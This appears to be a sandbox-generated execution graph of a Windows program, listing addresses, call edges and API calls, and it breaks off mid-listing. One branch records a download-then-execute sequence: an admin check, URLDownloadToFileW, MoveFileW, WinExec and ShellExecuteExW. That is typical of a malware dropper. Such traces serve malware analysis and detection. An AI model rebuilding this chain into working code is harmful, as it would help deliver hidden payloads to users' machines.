                                                                    execution_graph 10954 60c052 10956 60c05d 10954->10956 10955 60c082 10957 60c0a3 10955->10957 10961 60c099 10955->10961 10956->10955 10984 4fa870 10956->10984 10991 4b5668 10957->10991 10959 60c0b7 10962 60c0e6 10959->10962 10963 60c21a 10959->10963 11021 40b104 10961->11021 10965 40b08c 16 API calls 10962->10965 10995 40b08c 10963->10995 10967 60c10e 10965->10967 10970 43d0d8 50 API calls 10967->10970 10973 60c11c 10970->10973 10971 60c57b 10975 40b34c 25 API calls 10973->10975 10977 60c13f 10975->10977 10976 60c273 11014 4b4cdc 10976->11014 10979 40b08c 16 API calls 10977->10979 10981 60c16b 10979->10981 10980 60c28e 10982 40b08c 16 API calls 10980->10982 10983 60c2ac 10982->10983 11034 4fb948 SetLastError 10984->11034 10986 4fa890 11042 4fa780 10986->11042 10988 4fa898 11051 424ffc 10988->11051 10990 4fa8a0 10990->10955 10992 4b5671 10991->10992 11276 4b56ac 10992->11276 10994 4b568d 10994->10959 10996 40b0a2 10995->10996 10997 40b0bf 10995->10997 10996->10997 10998 40b0c1 10996->10998 10999 40b104 16 API calls 10996->10999 11001 43d0d8 10997->11001 10998->10997 11333 40eb60 10998->11333 10999->10996 11002 43d0e0 11001->11002 11003 43d0fe 11002->11003 11004 42a97c 46 API calls 11002->11004 11007 40b34c 11003->11007 11005 43d0f9 11004->11005 11006 409410 4 API calls 11005->11006 11006->11003 11008 40b4db 11007->11008 11009 40b371 11007->11009 11008->10976 11009->11008 11013 40b34c 25 API calls 11009->11013 11394 40a1e8 11009->11394 11401 40b6b8 11009->11401 11411 40eb8c 11009->11411 11013->11009 11015 4b4d03 11014->11015 11016 40c0c0 25 API calls 11015->11016 11019 4b4d61 11016->11019 11017 4b4dba 11017->10980 11019->11017 11514 4b3d64 11019->11514 11517 4b4c08 11019->11517 11022 40b10d 11021->11022 11027 40b13a 11021->11027 11023 40b12a 11022->11023 11024 40b16c 11022->11024 11022->11027 11023->11027 11031 40b132 11023->11031 11032 40b1af 11023->11032 11025 40b173 11024->11025 11026 40b17d 11024->11026 11538 409ddc 11025->11538 11541 409e54 11026->11541 11027->10971 11030 40b104 16 API calls 11030->11032 11031->11027 11033 40b08c 16 API calls 11031->11033 11032->11027 11032->11030 11033->11031 11066 4257c8 11034->11066 11036 4fb971 GetLastError 11037 4fb97c 11036->11037 11038 4fb9a1 11036->11038 11037->11038 11072 429308 11037->11072 11038->10986 11040 4fb98d 11077 409410 11040->11077 11101 4fafdc 11042->11101 11044 4fa79f 11045 4fa7d7 11044->11045 11122 4fbc54 11044->11122 11045->10988 11049 4fa7d2 11050 409410 4 API calls 11049->11050 11050->11045 11052 425011 11051->11052 11053 42a97c 46 API calls 11052->11053 11056 425049 11052->11056 11054 425039 11053->11054 11055 409410 4 API calls 11054->11055 11055->11056 11057 424f1c 6 API calls 11056->11057 11059 425069 11057->11059 11058 4250a7 11058->10990 11059->11058 11060 4250ab 11059->11060 11061 42509f 11059->11061 11063 424ffc 57 API calls 11060->11063 11273 4258ec 11061->11273 11064 4250be 11063->11064 11064->11058 11065 4258ec CreateDirectoryW 11064->11065 11065->11058 11081 40a8a4 11066->11081 11068 4257e8 GetFullPathNameW 11069 4257fa 11068->11069 11070 425809 11068->11070 11069->11036 11070->11069 11071 42581e GetFullPathNameW 11070->11071 11071->11069 11073 429319 11072->11073 11074 42931f FormatMessageW 11072->11074 11073->11074 11075 429341 11074->11075 11076 429367 LocalFree 11075->11076 11076->11040 11078 409414 11077->11078 11080 40945c 11078->11080 11083 406f68 11078->11083 11082 40a8aa 11081->11082 11082->11068 11086 41028c 11083->11086 11085 406f6d 11085->11080 11087 4102c1 TlsGetValue 11086->11087 11088 41029b 11086->11088 11089 4102a6 11087->11089 11090 4102cb 11087->11090 11088->11085 11094 4101c0 11089->11094 11090->11085 11092 4102ab TlsGetValue 11093 4102ba 11092->11093 11093->11085 11095 4101c6 11094->11095 11099 4101ea 11095->11099 11100 4101ac LocalAlloc 11095->11100 11097 4101e6 11098 4101f6 TlsSetValue 11097->11098 11097->11099 11098->11099 11099->11092 11100->11097 11130 4fb5b0 11101->11130 11103 4fb001 11104 42a97c 46 API calls 11103->11104 11107 4fb023 11103->11107 11105 4fb01e 11104->11105 11106 409410 4 API calls 11105->11106 11106->11107 11108 42a97c 46 API calls 11107->11108 11110 4fb04a 11107->11110 11109 4fb045 11108->11109 11111 409410 4 API calls 11109->11111 11112 4fb06e 11110->11112 11114 42a97c 46 API calls 11110->11114 11111->11110 11113 4fb096 11112->11113 11136 4fae08 11112->11136 11113->11044 11116 4fb069 11114->11116 11117 409410 4 API calls 11116->11117 11117->11112 11119 42a97c 46 API calls 11120 4fb091 11119->11120 11121 409410 4 API calls 11120->11121 11121->11113 11123 4fbc63 11122->11123 11125 4fa7bc 11122->11125 11124 4fbc77 GetLogicalDrives 11123->11124 11123->11125 11124->11125 11125->11045 11126 42a97c 11125->11126 11127 42a983 11126->11127 11151 40f080 11127->11151 11129 42a99b 11129->11049 11132 4fb5b9 11130->11132 11131 4fb5e4 11131->11103 11132->11131 11133 42a97c 46 API calls 11132->11133 11134 4fb5df 11133->11134 11135 409410 4 API calls 11134->11135 11135->11131 11139 424f1c 11136->11139 11140 40a8a4 11139->11140 11141 424f2f GetFileAttributesW 11140->11141 11142 424f42 11141->11142 11143 424fc3 GetLastError 11141->11143 11144 424f4a 11142->11144 11145 424f5e CreateFileW 11142->11145 11146 424f8c 11142->11146 11143->11144 11144->11113 11144->11119 11145->11144 11147 424f7b CloseHandle 11145->11147 11146->11144 11148 424f98 CreateFileW 11146->11148 11147->11144 11149 424fb5 CloseHandle 11148->11149 11150 424fbf 11148->11150 11149->11144 11150->11144 11152 40f088 11151->11152 11152->11152 11155 40f0d5 11152->11155 11156 40c4e0 11152->11156 11154 40f0c4 LoadStringW 11154->11155 11155->11129 11157 40c50d 11156->11157 11158 40c4ee 11156->11158 11157->11154 11158->11157 11161 40c498 11158->11161 11162 40c4c4 11161->11162 11163 40c4a8 GetModuleFileNameW 11161->11163 11162->11154 11165 40d70c GetModuleFileNameW 11163->11165 11166 40d75a 11165->11166 11171 40d5e8 11166->11171 11168 40d786 11169 40d798 LoadLibraryExW 11168->11169 11170 40d7a0 11168->11170 11169->11170 11170->11162 11173 40d609 11171->11173 11172 40d691 11172->11168 11173->11172 11189 40d324 11173->11189 11175 40d67e 11176 40d693 GetUserDefaultUILanguage 11175->11176 11177 40d684 11175->11177 11193 40ccd4 EnterCriticalSection 11176->11193 11178 40d450 2 API calls 11177->11178 11178->11172 11180 40d6a0 11213 40d450 11180->11213 11182 40d6ad 11183 40d6d5 11182->11183 11184 40d6bb GetSystemDefaultUILanguage 11182->11184 11183->11172 11217 40d51c 11183->11217 11186 40ccd4 17 API calls 11184->11186 11187 40d6c8 11186->11187 11188 40d450 2 API calls 11187->11188 11188->11183 11190 40d346 11189->11190 11192 40d350 11189->11192 11225 40d008 11190->11225 11192->11175 11194 40cd20 LeaveCriticalSection 11193->11194 11195 40cd00 11193->11195 11246 409d94 11194->11246 11197 40cd11 LeaveCriticalSection 11195->11197 11207 40cdc2 11197->11207 11198 40cd31 IsValidLocale 11199 40cd40 11198->11199 11200 40cd8f EnterCriticalSection 11198->11200 11202 40cd54 11199->11202 11203 40cd49 11199->11203 11201 40cda7 11200->11201 11209 40cdb8 LeaveCriticalSection 11201->11209 11261 40c9bc 11202->11261 11248 40cbb8 GetThreadUILanguage 11203->11248 11206 40cd5d GetSystemDefaultUILanguage 11206->11200 11208 40cd67 11206->11208 11207->11180 11210 40cd78 GetSystemDefaultUILanguage 11208->11210 11209->11207 11211 40c9bc 3 API calls 11210->11211 11212 40cd52 11211->11212 11212->11200 11214 40d46e 11213->11214 11215 40d4e9 11214->11215 11266 40d3e4 11214->11266 11215->11182 11271 409e78 11217->11271 11220 40d56c 11221 40d3e4 2 API calls 11220->11221 11222 40d580 11221->11222 11223 40d5ae 11222->11223 11224 40d3e4 2 API calls 11222->11224 11223->11172 11224->11223 11226 40d01f 11225->11226 11227 40d033 GetModuleFileNameW 11226->11227 11228 40d048 11226->11228 11227->11228 11229 40d070 RegOpenKeyExW 11228->11229 11236 40d217 11228->11236 11230 40d131 11229->11230 11231 40d097 RegOpenKeyExW 11229->11231 11233 40ce18 7 API calls 11230->11233 11231->11230 11232 40d0b5 RegOpenKeyExW 11231->11232 11232->11230 11234 40d0d3 RegOpenKeyExW 11232->11234 11235 40d14f RegQueryValueExW 11233->11235 11234->11230 11237 40d0f1 RegOpenKeyExW 11234->11237 11238 40d1a0 RegQueryValueExW 11235->11238 11239 40d16d 11235->11239 11236->11192 11237->11230 11240 40d10f RegOpenKeyExW 11237->11240 11241 40d1bc 11238->11241 11245 40d19e 11238->11245 11242 40d175 RegQueryValueExW 11239->11242 11240->11230 11240->11236 11243 40d1c4 RegQueryValueExW 11241->11243 11242->11245 11243->11245 11244 40d206 RegCloseKey 11244->11192 11245->11244 11247 409d9a 11246->11247 11247->11198 11249 40cbd4 11248->11249 11250 40cc2d 11248->11250 11251 40cb74 GetThreadPreferredUILanguages GetThreadPreferredUILanguages 11249->11251 11252 40cb74 GetThreadPreferredUILanguages GetThreadPreferredUILanguages 11250->11252 11253 40cbdc SetThreadPreferredUILanguages 11251->11253 11256 40cc35 11252->11256 11253->11250 11254 40cc7c SetThreadPreferredUILanguages 11257 40cb74 GetThreadPreferredUILanguages GetThreadPreferredUILanguages 11254->11257 11256->11254 11260 40ccbd 11256->11260 11258 40cc92 11257->11258 11259 40ccad SetThreadPreferredUILanguages 11258->11259 11258->11260 11259->11260 11260->11212 11264 40c9f7 11261->11264 11262 40ca60 IsValidLocale 11263 40ca73 GetLocaleInfoW GetLocaleInfoW 11262->11263 11265 40caae 11262->11265 11263->11265 11264->11262 11264->11265 11265->11206 11267 40d3f9 11266->11267 11268 40d416 FindFirstFileW 11267->11268 11269 40d426 FindClose 11268->11269 11270 40d42c 11268->11270 11269->11270 11270->11214 11272 409e7c GetUserDefaultUILanguage GetLocaleInfoW 11271->11272 11272->11220 11274 40a8a4 11273->11274 11275 4258f8 CreateDirectoryW 11274->11275 11275->11058 11277 4b56c7 11276->11277 11278 4b5772 11277->11278 11279 4b56f4 11277->11279 11303 424aa8 11278->11303 11299 424b00 11279->11299 11282 4b577c 11283 4257c8 2 API calls 11282->11283 11287 4b5770 11282->11287 11285 4b5797 GetLastError 11283->11285 11284 4b5711 11286 4257c8 2 API calls 11284->11286 11284->11287 11288 429308 2 API calls 11285->11288 11289 4b5730 GetLastError 11286->11289 11287->10994 11290 4b57b0 11288->11290 11291 429308 2 API calls 11289->11291 11292 42aa4c 71 API calls 11290->11292 11293 4b5749 11291->11293 11294 4b57d2 11292->11294 11307 42aa4c 11293->11307 11297 409410 4 API calls 11294->11297 11296 4b576b 11298 409410 4 API calls 11296->11298 11297->11287 11298->11287 11300 424b16 11299->11300 11301 424b4e 11299->11301 11302 424b48 CreateFileW 11300->11302 11301->11284 11302->11301 11304 424abe 11303->11304 11305 424afc 11303->11305 11304->11305 11306 424af6 CreateFileW 11304->11306 11305->11282 11306->11305 11308 42aa5a 11307->11308 11309 40f080 46 API calls 11308->11309 11310 42aa84 11309->11310 11313 425dac 11310->11313 11312 42aa92 11312->11296 11316 425dd4 11313->11316 11319 425e04 11316->11319 11318 425dcc 11318->11312 11320 425e0d 11319->11320 11323 425e6d 11320->11323 11325 425cbc 11320->11325 11322 425ed4 11322->11318 11323->11322 11324 425cbc 71 API calls 11323->11324 11324->11323 11328 42613c 11325->11328 11327 425cd5 11327->11323 11329 426196 11328->11329 11332 42618f 11328->11332 11329->11327 11330 424698 25 API calls 11330->11332 11331 425c40 71 API calls 11331->11332 11332->11329 11332->11330 11332->11331 11334 40eb85 11333->11334 11335 40eb6b 11333->11335 11334->10998 11337 40eb2c 11335->11337 11338 40eb30 11337->11338 11339 40eb3d 11337->11339 11341 40e80c 11338->11341 11339->11334 11342 40e8b8 11341->11342 11343 40e82c 11341->11343 11342->11339 11348 40e474 11343->11348 11345 40e854 11352 40e4dc 11345->11352 11349 40e487 11348->11349 11350 40e47d 11348->11350 11349->11345 11356 4089ac 11350->11356 11353 40e4e5 11352->11353 11354 40e4ec 11352->11354 11387 408b44 11353->11387 11354->11339 11364 4089ba 11356->11364 11358 408a08 11358->11349 11359 4089e3 GetTickCount 11359->11364 11360 408a55 GetTickCount 11360->11358 11360->11364 11361 408a8c GetTickCount 11383 408ba4 11361->11383 11362 4089fb GetTickCount 11362->11358 11362->11364 11364->11358 11364->11359 11364->11360 11364->11361 11364->11362 11366 408a2a GetCurrentThreadId 11364->11366 11371 408e38 GetCurrentThreadId 11364->11371 11376 408668 11364->11376 11366->11358 11367 408ab6 GetTickCount 11368 408a9c 11367->11368 11368->11361 11368->11367 11369 408b20 11368->11369 11369->11358 11370 408b26 GetCurrentThreadId 11369->11370 11370->11358 11372 408e45 11371->11372 11373 408e4c 11371->11373 11372->11364 11374 408e73 11373->11374 11375 408e60 GetCurrentThreadId 11373->11375 11374->11364 11375->11374 11377 408673 11376->11377 11378 4086a2 11377->11378 11379 408699 Sleep 11377->11379 11380 4086c1 11377->11380 11381 4086b1 Sleep 11378->11381 11382 4086ba SwitchToThread 11378->11382 11379->11380 11380->11364 11381->11380 11382->11380 11384 408bfd 11383->11384 11385 408bb6 11383->11385 11384->11368 11385->11384 11386 408be4 Sleep 11385->11386 11386->11385 11392 408838 GetCurrentThreadId 11387->11392 11389 408b7b 11389->11354 11390 408b4f 11390->11389 11391 408ba4 Sleep 11390->11391 11391->11389 11393 408845 11392->11393 11393->11390 11395 40a20f 11394->11395 11400 409d74 11394->11400 11395->11009 11396 409ddc 11397 409df0 11396->11397 11398 409de2 SysFreeString 11396->11398 11397->11009 11398->11397 11399 40a1ff SysReAllocStringLen 11399->11395 11399->11400 11400->11394 11400->11396 11400->11399 11402 40b6cd 11401->11402 11406 40b6ea 11401->11406 11403 40b6d2 11402->11403 11404 40b71e 11402->11404 11403->11406 11407 40b75d 11403->11407 11410 40b6e1 11403->11410 11405 40a1e8 2 API calls 11404->11405 11404->11406 11405->11404 11406->11009 11407->11406 11408 40b6b8 25 API calls 11407->11408 11408->11407 11409 40b34c 25 API calls 11409->11410 11410->11406 11410->11409 11412 40eb9e 11411->11412 11413 40eb60 14 API calls 11412->11413 11414 40ebb3 11413->11414 11417 40eaf4 11414->11417 11416 40ebca 11416->11009 11418 40eb27 11417->11418 11419 40eaff 11417->11419 11418->11416 11421 40e734 11419->11421 11422 40e750 11421->11422 11423 40e758 11421->11423 11433 40e5d0 11422->11433 11425 40e474 13 API calls 11423->11425 11427 40e780 11425->11427 11426 40e7c3 11430 40e4dc 2 API calls 11426->11430 11427->11426 11444 40e53c 11427->11444 11432 40e7e4 11430->11432 11432->11418 11434 40e685 11433->11434 11435 40e5e9 11433->11435 11434->11423 11438 40e5fa 11435->11438 11455 408850 11435->11455 11437 4089ac 13 API calls 11442 40e629 11437->11442 11438->11437 11439 40e658 11440 408b44 2 API calls 11439->11440 11443 40e67d 11440->11443 11442->11439 11459 40e460 11442->11459 11443->11423 11445 40e544 11444->11445 11446 40e54d 11445->11446 11468 40e00c 11445->11468 11448 40e2f0 11446->11448 11449 40e30a 11448->11449 11450 40e313 11449->11450 11452 40e32d 11449->11452 11472 40c0c0 11450->11472 11453 40e328 11452->11453 11454 40c0c0 25 API calls 11452->11454 11453->11426 11454->11453 11456 40885e 11455->11456 11457 408859 11455->11457 11456->11438 11462 408724 GetModuleHandleW GetProcAddress 11457->11462 11460 408850 5 API calls 11459->11460 11461 40e468 11460->11461 11461->11442 11463 40874c GetLogicalProcessorInformation 11462->11463 11467 408794 11462->11467 11464 40875b GetLastError 11463->11464 11463->11467 11465 408765 11464->11465 11464->11467 11466 40876d GetLogicalProcessorInformation 11465->11466 11466->11467 11467->11456 11469 40e017 11468->11469 11470 408850 5 API calls 11469->11470 11471 40e01e 11470->11471 11471->11446 11475 40be18 11472->11475 11474 40c0ca 11474->11453 11476 40be56 11475->11476 11477 40be3b 11475->11477 11478 40bec4 11476->11478 11480 40bf91 11476->11480 11477->11474 11485 40bf2b 11478->11485 11486 40bdd4 11478->11486 11480->11485 11503 40b8f8 11480->11503 11481 40be18 25 API calls 11481->11485 11483 40bedc 11483->11485 11496 40b7d0 11483->11496 11485->11477 11485->11481 11487 41028c 4 API calls 11486->11487 11488 40bddd 11487->11488 11489 40bdf3 11488->11489 11490 40bde5 11488->11490 11493 41028c 4 API calls 11489->11493 11491 41028c 4 API calls 11490->11491 11492 40bdea 11491->11492 11492->11483 11494 40be01 11493->11494 11495 41028c 4 API calls 11494->11495 11495->11492 11497 40b7ec 11496->11497 11498 40b830 11496->11498 11497->11498 11499 40b86a 11497->11499 11502 40b899 11497->11502 11498->11485 11499->11498 11500 40b7d0 25 API calls 11499->11500 11500->11499 11502->11498 11507 40b4f4 11502->11507 11504 40b901 11503->11504 11505 40b909 11503->11505 11506 40b6b8 25 API calls 11504->11506 11505->11485 11506->11505 11508 40b693 11507->11508 11509 40b517 11507->11509 11508->11502 11509->11508 11510 40b7d0 25 API calls 11509->11510 11511 40b4f4 25 API calls 11509->11511 11512 40eb8c 25 API calls 11509->11512 11513 40eb60 14 API calls 11509->11513 11510->11509 11511->11509 11512->11509 11513->11509 11520 4b3d70 11514->11520 11529 4b4c14 11517->11529 11528 4b3d95 11520->11528 11521 42a97c 46 API calls 11523 4b3dad 11521->11523 11522 4b3d6c 11522->11019 11524 409410 4 API calls 11523->11524 11525 4b3db2 11524->11525 11525->11522 11526 42a97c 46 API calls 11525->11526 11527 409410 4 API calls 11525->11527 11526->11525 11527->11525 11528->11521 11528->11525 11530 4b4c37 11529->11530 11531 42a97c 46 API calls 11530->11531 11535 4b4c54 11530->11535 11533 4b4c4f 11531->11533 11532 4b4c10 11532->11019 11534 409410 4 API calls 11533->11534 11534->11535 11535->11532 11536 42a97c 46 API calls 11535->11536 11537 409410 4 API calls 11535->11537 11536->11535 11537->11535 11539 409df0 11538->11539 11540 409de2 SysFreeString 11538->11540 11539->11027 11540->11539 11542 409e5a 11541->11542 11543 409e60 SysFreeString 11542->11543 11544 409e72 11542->11544 11543->11542 11544->11027 11545 645850 11548 4107f8 11545->11548 11547 645860 11550 410803 11548->11550 11552 409778 11550->11552 11553 409787 11552->11553 11554 40978c GetCurrentThreadId 11552->11554 11553->11554 11555 4097c2 11554->11555 11556 409ac4 11555->11556 11557 409835 11555->11557 11559 409ae0 11556->11559 11560 409af1 11556->11560 11571 40970c 11557->11571 11575 409a2c 11559->11575 11562 409afa GetCurrentThreadId 11560->11562 11565 409b07 11560->11565 11562->11565 11564 409aea 11564->11560 11566 406f34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 11565->11566 11567 409b97 FreeLibrary 11565->11567 11568 409bbf 11565->11568 11566->11565 11567->11565 11569 409bc8 11568->11569 11570 409bce ExitProcess 11568->11570 11569->11570 11572 409754 11571->11572 11573 40971c 11571->11573 11572->11547 11573->11572 11581 40f134 GetSystemInfo 11573->11581 11576 409a93 11575->11576 11577 409a36 GetStdHandle WriteFile 11575->11577 11576->11564 11582 40a5a8 11577->11582 11580 409a83 GetStdHandle WriteFile 11580->11564 11581->11573 11583 40a5ae 11582->11583 11583->11580 11584 405ee4 11585 405ef4 11584->11585 11586 405f7c 11584->11586 11587 405f01 11585->11587 11588 405f38 11585->11588 11589 405f85 11586->11589 11590 40581c 11586->11590 11593 405f0c 11587->11593 11596 405968 10 API calls 11587->11596 11592 405968 10 API calls 11588->11592 11591 405f9d 11589->11591 11600 4060ac 11589->11600 11594 4061f7 11590->11594 11595 405840 VirtualQuery 11590->11595 11599 40591f 11590->11599 11601 406084 11591->11601 11608 405fc0 11591->11608 11616 405fa4 11591->11616 11602 405f4f 11592->11602 11609 4058e7 11595->11609 11610 405879 11595->11610 11614 405f19 11596->11614 11597 405968 10 API calls 11618 4061c0 11597->11618 11598 40591d 11599->11598 11604 405968 10 API calls 11599->11604 11607 406110 11600->11607 11612 4060e8 Sleep 11600->11612 11624 406129 11600->11624 11606 405968 10 API calls 11601->11606 11619 405cec 10 API calls 11602->11619 11625 405f75 11602->11625 11626 405936 11604->11626 11605 405f31 11628 40608d 11606->11628 11607->11597 11607->11624 11613 406000 Sleep 11608->11613 11608->11616 11636 405968 11609->11636 11610->11609 11622 4058a4 11610->11622 11623 4058a6 VirtualAlloc 11610->11623 11612->11607 11620 406102 Sleep 11612->11620 11613->11616 11621 406018 Sleep 11613->11621 11614->11605 11615 405cec 10 API calls 11614->11615 11615->11605 11617 4060a5 11618->11624 11629 405cec 10 API calls 11618->11629 11619->11625 11620->11600 11621->11608 11622->11623 11623->11609 11627 4058bc VirtualAlloc 11623->11627 11626->11598 11634 405cec 10 API calls 11626->11634 11627->11609 11630 4058d2 11627->11630 11628->11617 11632 405cec 10 API calls 11628->11632 11633 4061e4 11629->11633 11630->11598 11631 4058ee 11631->11598 11660 405cec 11631->11660 11632->11617 11634->11598 11637 405980 11636->11637 11638 405bc8 11636->11638 11649 405992 11637->11649 11651 405a1d Sleep 11637->11651 11639 405ce0 11638->11639 11640 405b8c 11638->11640 11642 405714 VirtualAlloc 11639->11642 11643 405ce9 11639->11643 11646 405ba6 Sleep 11640->11646 11652 405be6 11640->11652 11641 4059a1 11641->11631 11644 40574f 11642->11644 11645 40573f 11642->11645 11643->11631 11644->11631 11680 4056c8 11645->11680 11650 405bbc Sleep 11646->11650 11646->11652 11648 405a80 11659 405a8c 11648->11659 11685 40564c 11648->11685 11649->11641 11649->11648 11653 405a61 Sleep 11649->11653 11650->11640 11651->11649 11655 405a33 Sleep 11651->11655 11654 40564c VirtualAlloc 11652->11654 11657 405c04 11652->11657 11653->11648 11656 405a77 Sleep 11653->11656 11654->11657 11655->11637 11656->11649 11657->11631 11659->11631 11661 405d01 11660->11661 11662 405de4 11660->11662 11663 405d07 11661->11663 11668 405d7e Sleep 11661->11668 11662->11663 11664 405778 11662->11664 11665 405d10 11663->11665 11671 405dc2 Sleep 11663->11671 11678 405df9 11663->11678 11666 405ede 11664->11666 11667 4056c8 2 API calls 11664->11667 11665->11598 11666->11598 11669 405789 11667->11669 11668->11663 11670 405d98 Sleep 11668->11670 11672 4057b9 11669->11672 11673 40579f VirtualFree 11669->11673 11670->11661 11674 405dd8 Sleep 11671->11674 11671->11678 11675 4057b0 11672->11675 11676 4057c2 VirtualQuery VirtualFree 11672->11676 11673->11675 11674->11663 11675->11598 11676->11672 11676->11675 11677 405e78 VirtualFree 11677->11598 11678->11677 11679 405e1c 11678->11679 11679->11598 11681 405710 11680->11681 11682 4056d1 11680->11682 11681->11644 11682->11681 11683 4056dc Sleep 11682->11683 11683->11681 11684 4056f6 Sleep 11683->11684 11684->11682 11689 4055e0 11685->11689 11687 405655 VirtualAlloc 11688 40566c 11687->11688 11688->11659 11690 405580 11689->11690 11690->11687 11691 60cb84 11692 60cb97 11691->11692 11693 42a97c 46 API calls 11692->11693 11696 60cbb9 11692->11696 11694 60cbb4 11693->11694 11695 409410 4 API calls 11694->11695 11695->11696 11697 40c0c0 25 API calls 11696->11697 11698 60cc9d 11697->11698 11699 40c0c0 25 API calls 11698->11699 11703 60ccde 11698->11703 11699->11703 11700 40b08c 16 API calls 11701 60cd1b 11700->11701 11702 43d0d8 50 API calls 11701->11702 11704 60cd26 11702->11704 11703->11700 11705 40b34c 25 API calls 11704->11705 11706 60cd43 11705->11706 11711 60de28 11706->11711 11709 40b08c 16 API calls 11710 60cd8c 11709->11710 11712 60de3b 11711->11712 11713 60de63 11712->11713 11715 42a97c 46 API calls 11712->11715 11714 40b34c 25 API calls 11713->11714 11716 60cd5b 11714->11716 11717 60de5e 11715->11717 11716->11709 11718 409410 4 API calls 11717->11718 11718->11713 11719 410c34 11720 410c5a 11719->11720 11721 410cdb 11719->11721 11720->11721 11723 410844 11720->11723 11724 41086f 11723->11724 11725 4108e0 RaiseException 11724->11725 11726 410908 11724->11726 11742 410975 11725->11742 11727 4109a8 11726->11727 11728 41099d LoadLibraryA 11726->11728 11732 410a3e 11726->11732 11726->11742 11730 4109f7 11727->11730 11731 4109ac GetLastError 11727->11731 11728->11727 11729 410aa7 11734 410aab GetLastError 11729->11734 11729->11742 11739 410a05 11730->11739 11740 410a38 FreeLibrary 11730->11740 11735 4109bd 11731->11735 11732->11729 11733 410a9b GetProcAddress 11732->11733 11732->11742 11733->11729 11736 410abc 11734->11736 11735->11730 11738 4109cf RaiseException 11735->11738 11737 410ace RaiseException 11736->11737 11736->11742 11737->11742 11738->11742 11739->11732 11741 410a0b LocalAlloc 11739->11741 11740->11732 11741->11732 11743 410a1b 11741->11743 11742->11720 11743->11732 11744 633404 IsUserAnAdmin 11745 633485 11744->11745 11749 63342d 11744->11749 11773 633718 11745->11773 11747 63348f 11748 63349d GetMessageW 11747->11748 11750 633491 TranslateMessage DispatchMessageW 11748->11750 11751 6334ad 11748->11751 11749->11748 11752 424f1c 6 API calls 11749->11752 11750->11748 11753 63344b 11752->11753 11753->11748 11754 4258ec CreateDirectoryW 11753->11754 11755 633459 11754->11755 11760 63534c 11755->11760 11757 633471 11764 633a38 11757->11764 11759 633483 11759->11748 11761 635360 11760->11761 11788 635b3c 11761->11788 11763 635399 11763->11757 11765 633a4c 11764->11765 11766 633a5c Sleep 11765->11766 11767 633a80 11766->11767 11768 633a89 URLDownloadToFileW 11767->11768 11769 633aa5 11768->11769 11848 639740 11769->11848 11771 633ac1 Sleep 11772 633ae5 11771->11772 11772->11759 11774 633759 11773->11774 12262 5eeaf0 11774->12262 11776 633782 11777 5eeaf0 2 API calls 11776->11777 11778 6337a4 11777->11778 11779 6337b7 ShellExecuteExW 11778->11779 11780 6337cb WaitForSingleObject 11779->11780 11781 63381c 11779->11781 11782 6337e4 MsgWaitForMultipleObjects 11780->11782 11783 633718 130 API calls 11781->11783 11784 6337d8 11782->11784 11785 6337fd GetExitCodeProcess CloseHandle 11782->11785 11787 633826 11783->11787 12265 5edfb8 11784->12265 11785->11787 11787->11747 11792 635b6c 11788->11792 11789 635bfd 11796 40eefc 11789->11796 11791 635c66 11794 409ddc SysFreeString 11791->11794 11792->11789 11812 4246d0 11792->11812 11795 635c86 11794->11795 11795->11763 11797 409ddc SysFreeString 11796->11797 11798 40ef24 11797->11798 11799 40ef7f 11798->11799 11816 40a800 11798->11816 11801 409ddc SysFreeString 11799->11801 11802 40ef94 11801->11802 11802->11791 11803 40ef3f 11822 40ed58 11803->11822 11806 40ef6c 11809 409ddc SysFreeString 11806->11809 11807 40ef5f 11808 40a800 4 API calls 11807->11808 11810 40ef6a 11808->11810 11809->11810 11811 40a1e8 2 API calls 11810->11811 11811->11799 11813 4246e0 11812->11813 11814 424701 11813->11814 11843 423398 11813->11843 11814->11792 11817 40a80d 11816->11817 11821 40a814 11816->11821 11829 409d7c 11817->11829 11838 40a650 11821->11838 11823 40ed6d 11822->11823 11824 40ed8a 11822->11824 11825 40edc8 11823->11825 11827 40ed75 11823->11827 11824->11806 11824->11807 11842 40f114 MultiByteToWideChar 11825->11842 11841 40f114 MultiByteToWideChar 11827->11841 11830 409d90 11829->11830 11831 409d80 SysAllocStringLen 11829->11831 11830->11821 11831->11830 11832 409d74 11831->11832 11833 40a20f 11832->11833 11834 409ddc 11832->11834 11837 40a1ff SysReAllocStringLen 11832->11837 11833->11821 11835 409df0 11834->11835 11836 409de2 SysFreeString 11834->11836 11835->11821 11836->11835 11837->11832 11837->11833 11839 40a656 SysFreeString 11838->11839 11840 40a65c 11838->11840 11839->11840 11840->11803 11841->11824 11842->11824 11844 42aa4c 71 API calls 11843->11844 11845 4233b1 11844->11845 11846 409410 4 API calls 11845->11846 11847 4233b6 11846->11847 11847->11814 11849 639749 11848->11849 11870 63b124 11849->11870 11851 63982f 11876 60b774 11851->11876 11857 63986d 11931 42547c 11857->11931 11859 63989c 11860 42547c 5 API calls 11859->11860 11861 6398c6 11860->11861 11940 42d8fc 11861->11940 11863 6398d3 11864 639901 MoveFileW Sleep 11863->11864 11865 639926 11864->11865 11946 633bd8 11865->11946 11867 639942 11950 63586c Sleep WinExec Sleep 11867->11950 11869 639951 Sleep 11869->11771 11871 63b138 11870->11871 11951 4b5a8c 11871->11951 11873 63b185 11956 4b59a0 11873->11956 11875 63b1ce 11875->11851 11877 60b8e4 73 API calls 11876->11877 11880 60b78b 11877->11880 11878 60b79b 11879 4b5668 79 API calls 11878->11879 11881 60b7d4 11879->11881 11880->11878 11882 42a97c 46 API calls 11880->11882 11972 60b824 11881->11972 11884 60b7bf 11882->11884 11886 409410 4 API calls 11884->11886 11886->11878 11887 60c5bc 11888 60c5e4 11887->11888 11889 60c5cd 11887->11889 11890 60c603 11888->11890 12063 60bdbc 11888->12063 11891 42a97c 46 API calls 11889->11891 11895 60b8e4 11890->11895 11892 60c5df 11891->11892 11894 409410 4 API calls 11892->11894 11894->11888 11898 60b901 11895->11898 11896 60bd01 11897 43eb70 71 API calls 11896->11897 11899 60bd23 11897->11899 11898->11896 11900 60b96c 11898->11900 11906 60bb82 11898->11906 11899->11857 11901 40b08c 16 API calls 11900->11901 11902 60b999 11901->11902 11903 43d0d8 50 API calls 11902->11903 11904 60b9a4 11903->11904 11907 40b34c 25 API calls 11904->11907 11905 60bc02 12250 609788 11905->12250 11906->11905 11908 40c0c0 25 API calls 11906->11908 11909 60b9c1 11907->11909 11908->11905 11910 40b34c 25 API calls 11909->11910 11912 60b9d2 11910->11912 11915 40b08c 16 API calls 11912->11915 11916 60b9ed 11915->11916 11916->11857 11918 609748 46 API calls 11919 60bc70 11918->11919 11920 609748 46 API calls 11919->11920 11921 60bc87 11920->11921 11922 609748 46 API calls 11921->11922 11923 